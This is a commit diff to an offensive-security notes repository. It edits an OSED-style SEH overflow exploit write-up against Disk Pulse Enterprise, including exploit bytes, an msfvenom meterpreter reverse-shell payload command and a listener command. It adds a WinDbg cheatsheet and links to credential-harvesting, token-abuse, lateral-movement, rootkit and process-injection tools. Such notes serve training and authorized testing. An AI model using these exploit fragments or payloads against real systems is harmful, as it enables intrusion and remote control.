[AHK] Automatic update 👽

SUMMARY.md

@@ -213,6 +213,7 @@
   - [OSCP BOF](expdev/bof/oscp-bof.md)
   - [OSED SEH Overflow](expdev/bof/osed-sehof.md)
 * [RE](expdev/re/README.md)
+* [WinDbg](expdev/windbg.md)
 
 ## ⚙️ Admin
 

expdev/bof/osed-sehof.md

@@ -150,7 +150,7 @@ send(buf)
 In case the bad characters cause the SEH overflow not happen at all, this command can help to speed up the debug routine:
 
 ```
-PS > Restart-Service "Vuln Service"; .\DbgX.Shell.exe -pn vulnsvc.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py
+PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; !exchain'; sleep 3; python C:\sehof_bad_chars.py
 ```
 
 In case the bad characters are truncated from memory, dump the bytes (*EstablisherFrame* - the second argument of the vulnerable *ExecuteHandler*) and examine them manually or use [find-bad-chars.py](https://github.com/epi052/osed-scripts/blob/main/find-bad-chars.py) by [@epi052](https://twitter.com/epi052):
@@ -173,7 +173,7 @@ Or
 
 ## 4. Search for P/P/R Sequence
 
-P/P/R == `pop R32, pop R32, ret`:
+P/P/R is `pop R32, pop R32, ret`:
 
 ```
 $ msf-nasm_shell
@@ -281,7 +281,7 @@ Search with [find-ppr.py](https://github.com/epi052/osed-scripts/blob/main/find-
 Break on the P/P/R and assemble a short jump over the *Next* structure exception handler:
 
 ```
-PS > Restart-Service "Vuln Service"; .\DbgX.Shell.exe -pn vulnsvc.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py
+PS > Restart-Service "Disk Pulse Enterprise"; .\DbgX.Shell.exe -pn diskpls.exe -c 'g; bp 0x101576c0; g'; sleep 2; python C:\sehof_ppr.py
 
 Breakpoint 0 hit
 eax=00000000 ebx=00000000 ecx=101576c0 edx=77e06fa0 esi=00000000 edi=00000000
@@ -492,9 +492,12 @@ Evaluate expression: -14084 = ffffc8fc
 
 And then assemble an appropriate jump:
 
-```
-jmp 0xffffc8fc
-0:  e9 f8 c8 ff ff          jmp    ffffc8fd <_main+0xffffc8fd>
+```python
+>>> from keystone import *
+>>> ks = Ks(KS_ARCH_X86, KS_MODE_32)
+>>> jump = [f'\\x{int(opcode):02x}' for opcode in ks.asm("jmp 0xffffc8fc;")[0]]
+>>> print(f"""b'{''.join(jump)}'""")
+("\xe9\xf7\xc8\xff\xff")
 ```
 
 
@@ -510,7 +513,7 @@ size = 6000
 shellcode_size = 600
 
 shellcode  = b'\x90' * 20
-# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=1337 EXITFUNC=thread -b "\x00\x09\x0a\x0d\x20" -e x86/shikata_ga_nai -f python -v shellcode
 # sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST eth0; set LPORT 1337; set EXITFUNC thread; run'
 shellcode += b"<SHELLCODE>"
 shellcode += b'C' * (shellcode_size - len(shellcode))
@@ -520,7 +523,7 @@ exp += LE(0x101576c0)  # (PPR) pop eax; pop ebx; ret
 exp += b'\x90\x90'                # (NSEH) offset for the 'eb 06' part of the jmp instruction
 #exp += b'\x66\x81\xc4\x52\x0f'    # (Island Hop) add sp, 0xf50
 #exp += b'\xff\xe4'                # (Island Hop) jmp esp
-exp += b'\xe9\xf8\xc8\xff\xff'    # jmp 0xffffc8fc
+exp += b'\xe9\xf7\xc8\xff\xff'    # jmp 0xffffc8fc
 
 filler = b'A' * (2499 - 4)
 nop    = b'\x90' * (size - len(filler + exp + shellcode))

expdev/windbg.md

@@ -0,0 +1,187 @@
+# WinDbg
+
+
+
+
+## Install
+
+- [https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/)
+- [https://github.com/TimMisiak/windup](https://github.com/TimMisiak/windup)
+
+Get the latest version (stolen from [here](https://stackoverflow.com/a/77062861/6253579)):
+
+```bash
+wget --quiet --continue  --no-check-certificate -O windbg.appinstaller https://aka.ms/windbg/download
+grep -ioP "htt.*bundle" windbg.appinstaller > msix.txt
+wget --quiet --continue  --no-check-certificate -i msix.txt
+7z.exe x windbg.msixbundle 
+7z.exe x *x64.msix -owindbgnew
+cd windbgnew
+start dbgx.shell.exe
+```
+
+
+
+### Symbols
+
+- [https://github.com/p0dalirius/pdbdownload](https://github.com/p0dalirius/pdbdownload)
+
+
+
+
+## Cheatsheet
+
+Load debugging symbols:
+
+```
+> srv*c:\symbols*https://msdl.microsoft.com/download/symbols
+> .reload /f
+```
+
+Unassemble from memory:
+
+```
+> u kernel32!GetCurrentThread
+```
+
+Read bytes from memory:
+
+```
+> db esp [L1]
+> db 41414141
+> db kernel32!WriteFile
+
+> dw esp
+> dd esp
+> dq esp
+
+> dW/dc KERNELBASE+0x40
+```
+
+Read data at a specified address:
+
+```
+> dd esp L1
+41414141
+> dd 41414141
+// The same as pointer to data
+> dd poi(esp)
+```
+
+Dump structures:
+
+```
+> dt ntdll!_TEB
+> dt -r ntdll!_TEB @$teb ThreadLocalStoragePointer
+> dt -r ntdll!_TEB @$teb
+
+> ?? sizeof(ntdll!_TEB)
+```
+
+Edit bytes:
+
+```
+> dd esp L1
+> ed esp 41414141
+> dd esp L1
+
+> da esp
+> ea esp "AAAA"
+> da esp
+```
+
+Search memory space:
+
+```
+> ed esp 41414141
+> s -d 0 L?80000000 41414141
+
+> s -a 0 L?80000000 "This program cannot be run in DOS mode"
+```
+
+Work with registers:
+
+```
+> r
+> r eax
+> r eax=41414141
+```
+
+Work with software breakpoints:
+
+```
+> bp kernel32!WriteFile
+> bl
+> bd 0
+> be 0
+> bc 0
+> bc *
+
+> lm m ole32
+> bu ole32!WriteStringStream
+> bl
+```
+
+Breakpoints and actions:
+
+```
+BOOL WriteFile(
+  HANDLE       hFile,
+  LPCVOID      lpBuffer,
+  DWORD        nNumberOfBytesToWrite,  // Write to file "hello" -> "db esp+0x0c L1" is 04 (length of "hello", also in esi register)
+  LPDWORD      lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+> bp kernel32!WriteFile ".printf \"The number of bytes written is: %p\", poi(esp + 0x0C);.echo;g"
+> bp kernel32!WriteFile ".if (poi(esp + 0x0C) != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}"
+> bp kernel32!WriteFile ".if (@esi != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}"
+```
+
+Work with hardware breakpoints:
+
+```
+// Before: write "w00tw00t" to a file, save the file, close Notepad, re-open the file
+> s -a 0x0 L?80000000 w00tw00t
+> s -u 0x0 L?80000000 w00tw00t
+> ba w 2 00b8b238
+> du
+00b8b238  "a00tw00t"
+```
+
+![[Pasted image 20230924234241.png]]
+
+Step through code:
+
+```
+> p   // step over
+> t   // step into
+> pt  // step to next return
+> ph  // execute code until a branching instruction is reached
+```
+
+List modules and symbols:
+
+```
+> .reload /f
+> lm
+> lm m kernel*
+> x kernelbase!CreateProc*
+```
+
+Evaluation and output formats:
+
+```
+> ? ((41414141 - 414141) * 0n10) >> 8
+> ? 41414141
+> ? 0n41414141
+> ? 0y10101010
+> .formats 41414141
+```
+
+Pseudo registers:
+
+```
+> r @$t0 = (41414141 - 414141) * 0n10
+> ? @$t0 >> 8
+```

pentest/infrastructure/ad/credential-harvesting/ssh-clients.md

@@ -12,6 +12,7 @@
 ```
 Cmd > reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
 Cmd > reg query "HKEY_USERS\<SID>\Software\SimonTatham\PuTTY\Sessions" /s
+PS > Get-ChildItem -Path "HKCU:\Software\SimonTatham\PuTTY\Sessions\" -Recurse
 ```
 
 

pentest/infrastructure/ad/lateral-movement/rpc.md

@@ -197,3 +197,5 @@ namespace SharpSCExec
 - [[PDF] Unorthodox Lateral Movement (Riccardo Ancarani)](https://github.com/RiccardoAncarani/talks/blob/master/F-Secure/unorthodox-lateral-movement.pdf)
 - [https://github.com/netero1010/ScheduleRunner](https://github.com/netero1010/ScheduleRunner)
 - [https://github.com/netero1010/GhostTask](https://github.com/netero1010/GhostTask)
+- [https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2](https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2)
+- [https://github.com/dmcxblue/SharpGhostTask](https://github.com/dmcxblue/SharpGhostTask)

pentest/infrastructure/ad/post-exploitation.md

@@ -167,6 +167,15 @@ PS > Disable-NetFirewallRule FPS-SMB-In-TCP*
 ```
 
 
+#### RpcShadow2
+
+- [https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp](https://red.c3r3br4t3.com/red-team-operations/lateral-movement/shadowrdp)
+- [https://github.com/c3r3br4t3/ShadowRDP](https://github.com/c3r3br4t3/ShadowRDP)
+- [https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/4c6481f4-a1cc-4c76-abc1-3ece834e6451](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/4c6481f4-a1cc-4c76-abc1-3ece834e6451)
+- [https://learn.microsoft.com/en-gb/windows/win32/api/rdpencomapi/nn-rdpencomapi-irdpsrapisharingsession](https://learn.microsoft.com/en-gb/windows/win32/api/rdpencomapi/nn-rdpencomapi-irdpsrapisharingsession)
+- [http://www.rohitab.com/discuss/topic/41626-rdp-com-server-client/](http://www.rohitab.com/discuss/topic/41626-rdp-com-server-client/)
+
+
 
 
 ## Run on Domain Computers

pentest/infrastructure/ad/privileges-abuse/seimpersonate/README.md

@@ -6,3 +6,12 @@
 ## Restore Privileges
 
 * [https://itm4n.github.io/localservice-privileges/](https://itm4n.github.io/localservice-privileges/)
+
+
+
+
+## Leaked Handles
+
+- [https://www.tarlogic.com/blog/token-handles-abuse/](https://www.tarlogic.com/blog/token-handles-abuse/)
+- [https://github.com/blackarrowsec/Handly](https://github.com/blackarrowsec/Handly)
+- [https://rastamouse.me/safehandle-vs-intptr/](https://rastamouse.me/safehandle-vs-intptr/)

pentest/infrastructure/ad/token-manipulation.md

@@ -7,6 +7,8 @@
 - [https://xret2pwn.github.io//Building-Token-Vault-Part0x02/](https://xret2pwn.github.io//Building-Token-Vault-Part0x02/)
 - [https://rastamouse.me/token-impersonation-in-csharp/](https://rastamouse.me/token-impersonation-in-csharp/)
 - [https://xakep.ru/2022/12/06/win-api-secrets/](https://xakep.ru/2022/12/06/win-api-secrets/)
+- [https://ardent101.github.io/posts/tokens_theory/](https://ardent101.github.io/posts/tokens_theory/)
+- [https://habr.com/ru/articles/776298/](https://habr.com/ru/articles/776298/)
 - [[PDF] Technical Analysis of Access Token Theft and Manipulation (McAfee)](https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf)
 
 ![Access Token Theft and Manipulation (McAfee)](/.gitbook/assets/011.png)

pentest/infrastructure/networks/README.md

@@ -1,4 +1,4 @@
-# Network
+# Networks
 
 - [https://github.com/frostbits-security/MITM-cheatsheet](https://github.com/frostbits-security/MITM-cheatsheet)
 - [https://xakep.ru/2021/08/25/stp-yersinia/](https://xakep.ru/2021/08/25/stp-yersinia/)
@@ -8,3 +8,12 @@
 {% embed url="https://youtu.be/JdeE4TQ3OsM" %}
 
 {% embed url="https://www.youtube.com/live/a-S_Sg2gyXo?feature=share" %}
+
+
+
+
+## NAT Hole Punching
+
+- [https://habr.com/ru/articles/763164/](https://habr.com/ru/articles/763164/)
+- [https://github.com/dwoz/python-nat-hole-punching](https://github.com/dwoz/python-nat-hole-punching)
+- [https://github.com/penumbra23/peerko](https://github.com/penumbra23/peerko)

pentest/infrastructure/persistence.md

@@ -273,3 +273,4 @@ $ pkill gs-bd
 ### Rootkits
 
 * [0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485](https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485)
+* [https://github.com/eeriedusk/nysm](https://github.com/eeriedusk/nysm)

pentest/infrastructure/post-exploitation.md

@@ -11,6 +11,7 @@ description: General Post Exploitation
 
 - [https://github.com/blendin/3snake](https://github.com/blendin/3snake)
 - [https://github.com/hackerschoice/ssh-key-backdoor](https://github.com/hackerschoice/ssh-key-backdoor)
+- [https://github.com/MegaManSec/SSH-Snake](https://github.com/MegaManSec/SSH-Snake)
 
 Search SSH logs for connection source IPs:
 

redteam/maldev/code-injection/README.md

@@ -331,6 +331,8 @@ int main(int argc, char** argv)
 
 - [https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html](https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html)
 - [https://github.com/S3cur3Th1sSh1t/Caro-Kann](https://github.com/S3cur3Th1sSh1t/Caro-Kann)
+- [https://caueb.com/attackdefense/threadlessstompingkann/](https://caueb.com/attackdefense/threadlessstompingkann/)
+- [https://github.com/caueb/ThreadlessStompingKann](https://github.com/caueb/ThreadlessStompingKann)
 
 
 
@@ -421,12 +423,27 @@ VerifierEnumerateResource
 
 ## PE to Shellcode
 
-- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI)
-- [https://github.com/TheWover/donut](https://github.com/TheWover/donut)
 - [https://github.com/hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode)
 - [https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/](https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/)
 - [https://github.com/paranoidninja/PIC-Get-Privileges](https://github.com/paranoidninja/PIC-Get-Privileges)
 
+
+
+### sRDI
+
+- [https://github.com/monoxgas/sRDI](https://github.com/monoxgas/sRDI)
+
+
+
+### Donut
+
+- [https://thewover.github.io/Introducing-Donut/](https://thewover.github.io/Introducing-Donut/)
+- [https://thewover.github.io/Cruller/](https://thewover.github.io/Cruller/)
+- [https://github.com/TheWover/donut](https://github.com/TheWover/donut)
+- [https://github.com/S4ntiagoP/donut/tree/syscalls](https://github.com/S4ntiagoP/donut/tree/syscalls)
+- [https://github.com/Binject/go-donut](https://github.com/Binject/go-donut)
+- [https://github.com/listinvest/undonut]https://github.com/listinvest/undonut()
+
 [Example](https://github.com/l4ckyguy/ukn0w/commit/0823f51d01790ef53aa9406f99b6a75dfff7f146) with [SharpHound.exe](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe) and donut (C# cross-compilation is done with [Mono](https://www.mono-project.com/download/stable/)):
 
 {% code title="sweetblood.sh" %}
@@ -481,6 +498,14 @@ This technique is enhanced and automated [here](https://gist.github.com/snovvcra
 
 
 
+### CLRvoyance
+
+- [https://github.com/Accenture/CLRvoyance](https://github.com/Accenture/CLRvoyance)
+- [https://github.com/kyleavery/ThirdEye](https://github.com/kyleavery/ThirdEye)
+- [https://web.archive.org/web/20230601160135/https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes](https://web.archive.org/web/20230601160135/https://www.accenture.com/us-en/blogs/cyber-defense/clrvoyance-loading-managed-code-into-unmanaged-processes)
+
+
+
 
 ## PE Injection